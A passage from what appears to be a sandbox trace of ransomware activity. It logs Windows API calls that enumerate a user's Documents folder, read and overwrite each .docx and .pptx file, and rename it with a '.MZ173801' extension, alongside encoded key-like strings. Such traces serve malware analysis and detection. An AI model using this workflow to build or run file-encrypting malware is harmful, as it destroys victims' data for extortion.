lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.550] GetCurrentThreadId () returned 0x1358 [0121.550] GetCurrentThreadId () returned 0x1358 [0121.550] GetCurrentThreadId () returned 0x1358 [0121.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\I_TP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\i_tp.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.550] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.550] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.550] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x86d4 [0121.550] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.550] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x86d4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x86d4, lpOverlapped=0x0) returned 1 [0121.551] CloseHandle (hObject=0x3fc) returned 1 [0121.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\I_TP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\i_tp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.553] WriteFile (in: hFile=0x3fc, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x86d4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x86d4, lpOverlapped=0x0) returned 1 [0121.554] CloseHandle (hObject=0x3fc) returned 1 [0121.556] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\I_TP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\i_tp.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\I_TP.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\i_tp.docx.mz173801")) returned 1 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.556] GetCurrentThreadId () returned 0x1358 [0121.557] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa5c9c0, ftCreationTime.dwHighDateTime=0x1d59e11, ftLastAccessTime.dwLowDateTime=0x6d4edac0, ftLastAccessTime.dwHighDateTime=0x1d5e43d, ftLastWriteTime.dwLowDateTime=0x6d4edac0, ftLastWriteTime.dwHighDateTime=0x1d5e43d, nFileSizeHigh=0x0, nFileSizeLow=0x66f9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="jkAe9XaDuAt8yrlc.docx", cAlternateFileName="JKAE9X~1.DOC")) returned 1 [0121.557] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.557] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\jkAe9XaDuAt8yrlc.docx" (normalized: "c:\\users\\fd1hvy\\documents\\jkae9xaduat8yrlc.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa5c9c0, ftCreationTime.dwHighDateTime=0x1d59e11, ftLastAccessTime.dwLowDateTime=0x6d4edac0, ftLastAccessTime.dwHighDateTime=0x1d5e43d, ftLastWriteTime.dwLowDateTime=0x6d4edac0, ftLastWriteTime.dwHighDateTime=0x1d5e43d, nFileSizeHigh=0x0, nFileSizeLow=0x66f9)) returned 1 [0121.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.557] GetCurrentThreadId () returned 0x1358 [0121.557] GetCurrentThreadId () returned 0x1358 [0121.557] GetCurrentThreadId () returned 0x1358 [0121.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.558] GetCurrentThreadId () returned 0x1358 [0121.558] GetCurrentThreadId () returned 0x1358 [0121.558] GetCurrentThreadId () returned 0x1358 [0121.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\jkAe9XaDuAt8yrlc.docx" (normalized: "c:\\users\\fd1hvy\\documents\\jkae9xaduat8yrlc.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.558] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.558] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.558] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x66f9 [0121.558] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.558] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x66f9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x66f9, lpOverlapped=0x0) returned 1 [0121.559] CloseHandle (hObject=0x3fc) returned 1 [0121.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\jkAe9XaDuAt8yrlc.docx" (normalized: "c:\\users\\fd1hvy\\documents\\jkae9xaduat8yrlc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.561] WriteFile (in: hFile=0x3fc, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x66f9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f9bc*=0x66f9, lpOverlapped=0x0) returned 1 [0121.562] CloseHandle (hObject=0x3fc) returned 1 [0121.563] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\jkAe9XaDuAt8yrlc.docx" (normalized: "c:\\users\\fd1hvy\\documents\\jkae9xaduat8yrlc.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\jkAe9XaDuAt8yrlc.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\jkae9xaduat8yrlc.docx.mz173801")) returned 1 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] GetCurrentThreadId () returned 0x1358 [0121.564] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x489762b0, ftCreationTime.dwHighDateTime=0x1d56dfa, ftLastAccessTime.dwLowDateTime=0xe254fb10, ftLastAccessTime.dwHighDateTime=0x1d5b61b, ftLastWriteTime.dwLowDateTime=0xe254fb10, ftLastWriteTime.dwHighDateTime=0x1d5b61b, nFileSizeHigh=0x0, nFileSizeLow=0x12bdd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="mXllPiyuRFE.pptx", cAlternateFileName="MXLLPI~1.PPT")) returned 1 [0121.564] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.564] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mXllPiyuRFE.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mxllpiyurfe.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x489762b0, ftCreationTime.dwHighDateTime=0x1d56dfa, ftLastAccessTime.dwLowDateTime=0xe254fb10, ftLastAccessTime.dwHighDateTime=0x1d5b61b, ftLastWriteTime.dwLowDateTime=0xe254fb10, ftLastWriteTime.dwHighDateTime=0x1d5b61b, nFileSizeHigh=0x0, nFileSizeLow=0x12bdd)) returned 1 [0121.565] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.565] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.565] GetCurrentThreadId () returned 0x1358 [0121.565] GetCurrentThreadId () returned 0x1358 [0121.565] GetCurrentThreadId () returned 0x1358 [0121.565] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", 